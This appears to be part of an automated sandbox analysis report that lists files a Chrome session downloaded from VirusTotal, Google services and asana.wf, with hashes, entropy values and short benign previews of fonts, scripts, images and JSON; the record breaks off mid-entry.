                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/user_notifications
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "20240110093621-everyone",. "type": "user_notification",. "links": {. "self": "https://www.virustotal.com/ui/user_notifications/20240110093621-everyone". },. "attributes": {. "title": "Threat Hunting Open Session - Episode 5",. "target_tags": [. "everyone". ],. "body": "<p><a href=\"https://www.brighttalk.com/webcast/18282/604369?utm_source=VirusTotal&utm_medium=brighttalk&utm_campaign=604369\">Join us</a> next <b>January 11th</b> for a new <b>Threat Hunting live session</b> where we will cover how to hunt through <b>Sigma rules</b> with the latest features we have added on macOS and Linux, and explore how <b>Crowdsourced AI</b> analysis compares to and complements the identified Sigma rule matches.</p>",. "date": 1704879381,. "link_url": "https://www.brighttalk.com/webcast/182
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):569
                                                                                                                                                                                                                    Entropy (8bit):4.896633254731508
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:Uc11FP/sO6ZRoT6pHAciJkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKuJXYmOOk4TfenEPCD
                                                                                                                                                                                                                    MD5:71D6A57D21337114032CA39B294F3591
                                                                                                                                                                                                                    SHA1:ADA1D867672276F16EF4D3B8A46A519FBA8E3D4E
                                                                                                                                                                                                                    SHA-256:36B2057EB5EEF261A2CBB8C149DCF3A11EDAA15CCD8E3D462EB34999F5FF8F2A
                                                                                                                                                                                                                    SHA-512:BC5F5B55C2741FED993D5D25A36030028C388C8888EA2D1D1F24970AEC4F856CDA366940B99D54FF2D4D9AF16DF8DE39AB847A7BA2BE0B649DE1CE2C9E70A330
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://fonts.googleapis.com/icon?family=Material+Icons
                                                                                                                                                                                                                    Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1534), with no line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1534
                                                                                                                                                                                                                    Entropy (8bit):5.905972634380194
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:2jkm94/zKPczAjZy+KVCLTLPeYAgFnu5vtTGJTlDTL5ncCxHgFnu5flWtRcw1MuJ:VKEzixKonjfcvtTARXx/g7b1Muh6Lrwt
                                                                                                                                                                                                                    MD5:00F00ECFC31E8668C47723DC8ECF4FF6
                                                                                                                                                                                                                    SHA1:68490096677E1D42F4BCF7AC1D516C827D7416CE
                                                                                                                                                                                                                    SHA-256:9168F802C04B68D45D78264A007B697E2E006F46B86A5BF179D168EE3174E0DC
                                                                                                                                                                                                                    SHA-512:FB7C4E0B493614FC241021F0436C3E77FDFFC8304B8F55F0A67BC4C38D8BB7AC7C8F625D02D825C47A6891E54D285B9994AA78480ABC4561965209AD5F12A3B5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://recaptcha.net/recaptcha/api.js?render=explicit
                                                                                                                                                                                                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://recaptcha.net/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A89JPrWYXvEpNQ/xE+PjjlGJiBu/L2GfQcplC/QkDJOS1fBoX5Q4/HLfT1dXpD1td7C2peXE3bSCJiYdwoFcNgQAAACSeyJvcmlnaW4iOiJodHRwczovL3JlY2FwdGNoYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='3NNj0GXVktLOmVKwWUDendk4Vq2qgMVDBDX+Sni48ATJl9JBj+zF+9W2HGB3pvt6qowOihTbQgTeBm9SKbdTwYAAABfeyJvcmlnaW4iOiJodH
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4300)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):4305
                                                                                                                                                                                                                    Entropy (8bit):5.8227297901724056
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:4KliEHZFd66666NGavHljpzHowj3bULXdcxj2SglxoDfmp7BxN1XyKmQffffo:4Y7Fd66666NGa/lFHoHLtcxj2SCa2tfI
                                                                                                                                                                                                                    MD5:3DADDED44C01DF59FA1750E8E78CC838
                                                                                                                                                                                                                    SHA1:573F7632B46F4FBF7F32B3D7A9A37DB33EEDA45A
                                                                                                                                                                                                                    SHA-256:04C02EA5B7FD9E8E4BAD1520EE7DCD69EA057469DCCEE4ABB517F3089DF6759E
                                                                                                                                                                                                                    SHA-512:B67CC8A0E5CC8B960EBDE8A84A949F299236492E2CFDA96B2AB67016D6688B0EB54C973B4CA962661933B95762B7E287FD5A769A8B7A5C6A12CAC92BE6C69E48
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                    Preview:)]}'.["",["home depot halloween skeleton dog","unc basketball rj davis","lego nasa artemis space launch system","severe weather","raleigh durham airplane crash","shogun series finale","lakers vs nuggets","prime energy drink lawsuit pfas"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXBrYjljcHQ1Eh5SSiBEYXZpcyDigJQgQmFza2V0YmFsbCBwbGF5ZXIyjxNkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFhQUFBREFRRUJBUUFBQUFBQUFBQUFBQUFFQlFZREFnY0EvOFFBTHhBQUFnRUNCUUlGQkFFRkFRQUFBQUFBQVFJREJCRUFCUkloTVJOQkJpSmhjWUVVVVpHaEl4VXlzY0hSTlAvRUFCb0JBQUlEQVFFQU
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 108226
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):33128
                                                                                                                                                                                                                    Entropy (8bit):7.990639820342265
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:Oe1gaKaCQn2UfKdK1Kpwd0XfcxzB3WvlrzW2:Oe1DbhHgK14OUvk2
                                                                                                                                                                                                                    MD5:5A10F571B35BF4EAA7573AF76E977A03
                                                                                                                                                                                                                    SHA1:A3292C934EB32C9517E5B81F553C7E54D4DBBF75
                                                                                                                                                                                                                    SHA-256:45844C2EF976CF623259F983D7A2D5B25ABF3F47E5B0FA0B057DD9DAD403D58A
                                                                                                                                                                                                                    SHA-512:C2367E6FBC924864B5738304C908D04C75D068C14B3295B35C4E7A949303B1DC4C20A97F18FB1BF2721534522A2BB868E99F68D325B8D5BE18B85464D5AEFF90
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/30578.8f26f81ecad64b338ebc.js
                                                                                                                                                                                                                    Preview:...........y.#.u...}.-.V.......G.)9.D.;...X..D.DD...."......S....%.Y.Q<DuU.r.s.T..*.:o..No&g.\......../......w.....]].|.m.......p.6F.^/..qg........?....d.^....uky..7....q7..'.W....}......agT?z5Y&.....?...~...~.1.g?.......v....?.n:.........^.q..^'...g..t..a.1..p<....~v...#\.s<.t.z.ZO.........n..*['..........I............v~..-..K_tc.4.Y.n.|{.....o....4.U....6.?........2[.....l..yp.jM......i......l....jq.*.Qk}.....~...:.....6$38.,/n...z.....K 6.....p~{uu||..xq........l...sF...f....f..Y .pq4;?.-.i..x..&[.'_f.W...8....4;[,'.>;...G.|..+(.....t..........L.............<.?.......G....~..J....>.0..z.....^cvo.........d.J.7.l>]%.....gW..x.h..&W..am....'..W...MVo..l.<.l.....b:..5.`%..M_...a............!4t....Z..=t.9........../.?h.......t..oc......~..8.].8MdG.......(..]d..e.....b......w.[.......6[.=..4.j>......?..lz.A.......p|....`....*[y...zq.....=..|..W..~.&Q.S.q.....y..}R...... 0.d...QSn....E..o...z..L..P..=....aT4...'....@. \G.6.N.'.l..]...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):9052
                                                                                                                                                                                                                    Entropy (8bit):7.980303064174038
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:xJJ0lo3i9Yw+4OWpoHysYSj0km38ShICjaWr4Jeeh8uGzL6Ateiy:/Jmoy9V+USHysYa0km3LmSeeFuOJw
                                                                                                                                                                                                                    MD5:A6778676E30B66219234574CFD07FCBA
                                                                                                                                                                                                                    SHA1:48D1262DF15B57171E5E596C5ED498450F36AEBD
                                                                                                                                                                                                                    SHA-256:B8FF4EA74F70D06FB28DFF668E4DAECCD171850426F17375E355577D02F0C320
                                                                                                                                                                                                                    SHA-512:41A2C24D523F32F3E0830352DB21372635C9AC7FBD43C7F957041939CE323D32341AF5B2685ADF40A74A0455F59985521C8BA73D638471F9854C82BFD736D954
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/card-zoom-1x.webp
                                                                                                                                                                                                                    Preview:RIFFT#..WEBPVP8 H#..P....*0.u.>.F.J%.#!.sZ@...in..N9s2v.....=...]...i..Z......wJ.F..2.x1E...|.f...")..u.k.45.6........L,.IJ..B.S.....4nG.....Q.s..i.L...eq.s.mRJ;...N-..7.M.u"}.N6..[.fm..w..v....t.A..5]..(.q.....d...C..fM.....aI..Zm.=>..I.3..g{..\.>.p./..*BU). U....Wi.,...a 0......PR`.A..((~ ..w............PTlE..y...Z.95bP.W.....<?.uA..3.c..1. (.\.n..l~..4..,.M.zc..n..B...c.jZ..t..(..zV.....".....8..@|-@...jj....4....}AA.9.......u.[h.Q..q.!.{...e..3......K.(..H.U.G.E.nn.)....`....a9K.p.MX.....QX..d...!...1.:#t..#2z..C....OpX........n.{S......t.0i.....6...8}...jbU.K:.S.......n...t.n....8..2G..........`Z.4p%.T....~.....Q.T.....^......(./.]....w..ED?s....T..z h.......pwJ.q?.O.....v~I..=...^\....Wy.V..f&.2dA.*..-oiI...k.A..K..d.\..Q0B....p.5......w...ir...6.8.R"....`n..q..3.....2../.8..*[....m.%..G.......q..e>..Z.P.H......N......w.........2:..|...F...'.......(~U.....=..|i...IF..Z..g.`M.8b[b,X<..'.....z.>.5!.7_q..c...5......y<lp....P.8.+J9+.`
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):16548
                                                                                                                                                                                                                    Entropy (8bit):7.988647764925039
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:nl/cWTILCZTIWBCxutYdh7aR+clC6qjxY:nl/cW8LCZkWBCktuaRlCzu
                                                                                                                                                                                                                    MD5:60861A57D59EC609E542946C40439859
                                                                                                                                                                                                                    SHA1:E380FD9D9EE41E4B4233F02CC75484BB443C5FEC
                                                                                                                                                                                                                    SHA-256:92CC31ED3858EDF7F506B164F99A845DC1149EB7D204C3E24E55A0046683CC09
                                                                                                                                                                                                                    SHA-512:46F56D7159B7C3C8FE4B2BF597EC44C9CD402B9CDE72975CF45F809F0C3E2483533D784811AF05F179441DBE98B6E4257395666360BF9CA71286A62DE4FA5F2A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.@..WEBPVP8 .@..p7...*0.u.>.@.K..&,..;A...gn..3.Nw7p.O..|I."...*...........g.?..}......u8[./..;.s..P...A....K.[.......d......_.w....f....A..O_Y4.."3I......2..]....8...x.AK^.......%.[............_.F..X.v...6..nNP......e....D_U....di...j..B.K4 .=.2.).._.8s...e.u:.(....>.......Pu..q.>.W.K......"...B%....(T.iy...t..m...n.|.......}`.pE*.gg.WS*p.*.......xj...#.+.>f&.l....xZ.....,.E..:...c.....P..rxdL..'.j...a.H.... .....y.w........mI..(.........P.n.....f.g.......,d.v..p6..e...._..xH..Dv071.....P..Z..n..N[3HX.N&+O...Rm0.w...n......EF...ds.<....[."q,>.W..3.....{gs..iL...h..&+.NRH.;.5...V8o:....S*.H.....=....+.K?...7.B.-BIq+...K.;...[..j..........}%....kf|...y..22........u.>...3...y..I....m.nzQ.....u.P.=.(.m..DX........DC.K.".#V,.e.....D.P.z...8..9v'....:...1..L._..R.B...#C.../.4....%...&......pUY........d...B...<..Z.s.u}.<.. ......]...nI.L...C..S..6....S..Y.*2...........zC.G...~ZD1..T).U.:..h....9.)E.[.?..cm...TV.e...%Y.u...71e...b\......>}.<..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 14892, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):14892
                                                                                                                                                                                                                    Entropy (8bit):7.98489201092774
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:LKrbeS3uuEGg7o6yDdWa/TQcNc+rAsmnsTJ39cUZi:LKneSe4/6yDFU6rAGJZE
                                                                                                                                                                                                                    MD5:9EC6DEAF6BADA919E20B98F9F7B718B1
                                                                                                                                                                                                                    SHA1:501D36403AD8205E4644532600019ECB10F5CB0A
                                                                                                                                                                                                                    SHA-256:7B348B30EA1FE43857E68FC462C29E5C6E63C97666AF75135C4396A272E54762
                                                                                                                                                                                                                    SHA-512:03849431CEF204A1584FFE6F23DBE86730AFD076146AB3D1855B9C3402168A97FAA8A529E69FAE45EA24CFF7110C2930CB4744162BA0ED95D95600F6E777B322
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/1402accbefdec6a25762.woff2
                                                                                                                                                                                                                    Preview:wOF2......:,.......|..9..........................n..B....`..b...L.4..d..6.$..D. ..f..4..v%..........D..dd.do......:d..M....E.&..J..G....3.Mxp....i....V..u$.[O.;MU.:j.?..{+/<....s....^[..d.d.....t A....`..z....IN^.......2......mY.kF...\...UYU..........$.O=5..2q..L.2.1.c.....`x~n=.'Ur.66V.f]./..L1..P..<.0.<.8.....Z/.+.H....y..F....h5....V.j.....l..O#.:-Q....9g....:..?..8v];u,O..'....c.\r......].&w.....%@..Z.^....$.,dJ....W.{.....h8}4..S/.sZ...f."$..`a.$Mb.....;.W.."..y.H.<.g.......oNS..MO....X.%.8..y.\...ly..w..?-.~.o.ZZ~G.....B.....@...._....g.fF_...d-...aA_..#k.I.....x...P.}z..JQ&E........).P|."g.#.)Q.*T...}.PD.T+<}c+.||0...2.F..hD.X.J.O.eJ:.%ZW.m.K.Jd..*c.7.....T.cr.2....DD.........2..y..?/g...... ={..c /.....X.0.F.F.PX.P..!..K..K.....i.%....B.."...A....F.........4..........S........z$`.T..h...E..........._%=..).)......x)...A.J..K...?.V.......w.Y}..N.....}..>.......%.f.O..o.{..=wz.e_&.O\..*..Q..c.'...X&.1wS.R..AY...G.....Q.f...z..E..u8&V
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):12168
                                                                                                                                                                                                                    Entropy (8bit):7.973984646008146
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:deBgH7UvX1yotyPintNpaOzulD7Ps8Qj36NeB7KnPCBLGAkQPvLynKBU7/nkacEL:KgHwvX1BuQNpAHkZqeB7uKIQXLynKBUD
                                                                                                                                                                                                                    MD5:4A2B76058A3E9F0CC563D84B91B4E654
                                                                                                                                                                                                                    SHA1:E7572E7BC9D8D4099AF08944A27392D28C7D715A
                                                                                                                                                                                                                    SHA-256:B5505605161A0DD5ED97A4355F78250953B6E3ECA9ECB016D2A1696094959B17
                                                                                                                                                                                                                    SHA-512:EB9E334BEF8228D0C979D8213C53799004D8686956ABE9F4FDBCD5F7A7024994173EB1CDC41EFDAC4599C09B80A19696867847EB963A8E2D5B52BFA4DAA45805
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF./..WEBPVP8X...........c..ALPHk........F'.n....@Hb1..8H,#.........b....y>..."..F.Dc..[{...+.|.79...~....^..e.M.-c.....j.wu.!OzY..zk...D.....M.-%..Gy...W..k.y.(..4.e+?[...H.^N?96.w."Mz....&.vA.I/...j.F.&..f66.7..&..h...eo@...&....!Mz.2.m."Kz..9.4..T.v..._...=.v."Mz.5..E.......?............?............?............?............?............?............?............?............?............?............?............?..............."Mz...F.&..g..Q.I/.Io.(....-z...^|...O.eY..b6.m."Kz...V..G.(.^.....=.^^\...wP.EY...G.q....e....Y.....Me[...zy.4.>...r....bQ..</z........,Gz.7..U..ugQ..T........:Z.ue/.....~...m..X.%H/...u-..VP8 .,.......*..d.>.H.K..".......en.P.W......U....oe...7...o..*...........}._.w.`....?....G......W.....P...:.=..v=Z?.~.|<~....gj.....p?.zn..-3..[........G.........[.<....{....?....5......._.=Ezj..;.O.eL..1KK.P...r.,....*.y....m>LR.B...b....z...b....z....h..gd..)....T=.....*.y.......*.y...o*z}.*fvA...u...M.T....<...T..2.YS3.3R
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 25095
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8621
                                                                                                                                                                                                                    Entropy (8bit):7.97305016971054
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:djx4WCVPIbOm900Rm4iReOj9bVK1l4EPfXyax7N8GFIf+bkEODd8YpZw:djCXdIbOm9rRXSeOj1VK33H7KGFJbzYI
                                                                                                                                                                                                                    MD5:552A1BD34A79331A10018DF4916CD3E9
                                                                                                                                                                                                                    SHA1:7E8524A871DD887DE641DE46905799C687CC0D83
                                                                                                                                                                                                                    SHA-256:C73A8E5C39717E540A4A0011676455A9347F5CEED82C25C3226A31B3A5F5EC70
                                                                                                                                                                                                                    SHA-512:C84A60AFEAA4B2D67E973CEE72C8F1BE0D8617EBD0314BECFF6AC5C26526D6073E1992866BA42F554DC8E9D2A4D5B3113B0E2C9108B16BDAD51B24BA31B9FE41
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/vt-ui-shell-extra-deps.dd2c31d5f5a0bc61bbe0.js
                                                                                                                                                                                                                    Preview:...........\i{.F..._.B.?...H.IC.#..e..c.....M...0...4...[}. ..dv.d.........".,..p...3.....?.8.....|....0..h.....r.lj...m?....{{v...:..{......-o........._...\.)K....y..eg........[[..5.x...#.{.\..y.E<..$......2....b..<s#.O.x..../.... .^.......U.*M.<.o..l...<I.dl..A86.Dt5</...d.^.q.......F...Q..9..Ou/^...x.#.c1.........}.3...23...g..f...L.~.O......`Y.>$. .."....<H.<P...8....g'+.......2.s...K..0..qB.r.. ...b-..0e..[ ..i......qx;|K..Nc.x.].3J. .'...rt.1 ..x....K.....8......2C.7k..b ...~..A.....E.....K@..f.. 6f..>..!{\p>...Y.S...[. .Z.[..|...:.-..O.J.k@V..4.E....`.^.=.$...)..w..Z...U`rk....<......T.|9.x...w..^..Y..$...<.L......:...y8.."..lG...7..lV.S....0`..)..].n1.X\P.Xe.{.F~42w:_3.}..5.g<.9...fo5...5.y..n...\H.....j2...Y.NN$.."....U......M.su.wWk.cY}..r=ImmK.Vv.x....g.O~.^...'Wf...ZN..`02O.E.;WB.2.$..?.fC...3;..<..........&..Ip.qc.E..=^...... ..Y..$.j.1h#...n.....h....%3.aG.k.q.....\..;;.;.Y.O8uZ..n...].."{..~t...0..f.03..T.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):64905
                                                                                                                                                                                                                    Entropy (8bit):3.4139446909991134
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:+6U1lnWC+wxUk1cJJTJTr3e/S0QN9XaKKO1oIK0Gvm67kZcVH1vYa2P/jAKaoARU:+H1vxW3gI1witnt9H5
                                                                                                                                                                                                                    MD5:9E4D9AFF60F6498C645A41C33B4881BE
                                                                                                                                                                                                                    SHA1:4ADAC0F8F4DDD0377799646A6EAE7C1F1653E3C8
                                                                                                                                                                                                                    SHA-256:01FBD9B9D2925BEF8F09FC09EFD02C7F2F42056F57FC0CC28CEBD877E77C6F7A
                                                                                                                                                                                                                    SHA-512:5BB8F039A350EFF18FB5DF13D6DC65AF27768A628545540D0F06073490F28A175FB2D5F01EBD04FCCAB6B0101171B077B78F86ECF79B0027855465C0436504C0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTMxfHwyNWE1MmNhNDQ4NzE5OWMzYjUwMmU2ZjcwODI4MTNjMTVmMmY0ZmEwYjEyYmE2NDQ4M2Y4MWIyYmIzODFjOGEw
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "7778c658411a2f1649ced14cdfe8a92145c1c7fa53b1ce5b14920000fe99bd98",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/7778c658411a2f1649ced14cdfe8a92145c1c7fa53b1ce5b14920000fe99bd98". },. "attributes": {. "first_submission_date": 1701113263,. "md5": "da5bf3010154020db9db4cf8832b42ea",. "unique_sources": 6,. "ssdeep": "384:wrBzBV4OHcvFcYlu2V8uMcg5apqpBw2qFA5WFQExxR/c/mZ1:KBr4DSYlu2VzMcgwgBLqJQO/ceD",. "last_analysis_stats": {. "malicious": 0,. "suspicious": 0,. "undetected": 61,. "harmless": 0,. "timeout": 0,. "confirmed-timeout": 0,. "failure": 0,. "type-unsupported": 14. },. "size": 14990,.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):478377
                                                                                                                                                                                                                    Entropy (8bit):3.467675957711004
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:HkVF1a272cUMhEJMX4wo9GxE+it2JVs4sD8a2fiVqbR7LLqa20:AS5MOqJqm
                                                                                                                                                                                                                    MD5:EFBAFFFB8EE8573787AB802918D8FFDE
                                                                                                                                                                                                                    SHA1:BA5032678712C1B03A43161859F9FC7CF104579E
                                                                                                                                                                                                                    SHA-256:9A7FFD029DC6C1279E285B7D7DA33A19C2993C3FB946D21DAD4E6E379070C59E
                                                                                                                                                                                                                    SHA-512:723BA4195B90469030D8FD64641CD135A269BFF830631889F7E57DD45F44D6813D03946E1EFA390ADCA94485C987CC00DB3F900CA6C1617B69180C12CC34B09F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5". },. "attributes": {. "sha256": "e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5",. "magic": "ASCII text",. "last_modification_date": 1714008537,. "popular_threat_classification": {. "suggested_threat_label": "trojan.boxter/powershell",. "popular_threat_name": [. {. "value": "boxter",. "count": 7. },. {. "value": "powershell",. "count": 4. }. ],.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):29050
                                                                                                                                                                                                                    Entropy (8bit):7.974981283106669
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:fOLZy5yyhnsspS/xw+Cn34Ah7LiSu045yTG5t0wkk+q:fOs5l1pS6+Oh7LiSurt+/q
                                                                                                                                                                                                                    MD5:A4EE9E394AC7AAFAB4429D9148C36288
                                                                                                                                                                                                                    SHA1:16E9D330298A257FE1CA884E3FC8C0FCF9BCB22A
                                                                                                                                                                                                                    SHA-256:61B5DEB295305A04EF52E9758D565D2A4EA275F034D2034F52B4F877C6809B04
                                                                                                                                                                                                                    SHA-512:C6D4464EFF0D86C9252C94EE7506AB959E9B26D2D2FEB00B3D57A0146A4CCACA2CEC3F30E62AE667B7ECFE4D35F9D3F22D75528A64DD5F040BCC57A8E61189FF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-ai-en.webp
                                                                                                                                                                                                                    Preview:RIFFrq..WEBPVP8X...........a..ALPH......P...I......8(...q@.D..../!. .u...p.../)y?.y...~I..V.S.K.../..K....K...W.T.(...d...rI...%a......]R.%".%i/.[.6G....pI.9o.......Z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................{..7.m.....1gm[D..jD.9...Qz...CL.....|m...l.7....;.k...c......S....j=...%.?...s...i...VP8 .n.......*..b.>.H.L..#%.3.....in.B...^!Mc.:.n........2......}.?..R..."t.~..N.'.o..........G....}1....m.....5......E.K....S.....'............W.....7...w../...?..s.....I...=.Z_.......}7...o.....z,.M.k..?....!.!............*......._.>._...../...O.k........{S.....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 29354
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):9873
                                                                                                                                                                                                                    Entropy (8bit):7.977330194787907
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:9EJWrTX82mc8SJUyBW9g01ozxqY6vwj0HxU5hT63SVT:92WrTXQc8SO2DKouvwN5hT6iF
                                                                                                                                                                                                                    MD5:4F206168CA2C6B5F01145D4DE95FCB30
                                                                                                                                                                                                                    SHA1:CA8B8A7DF55289DA3DC451F3A681137C0AAF0C8C
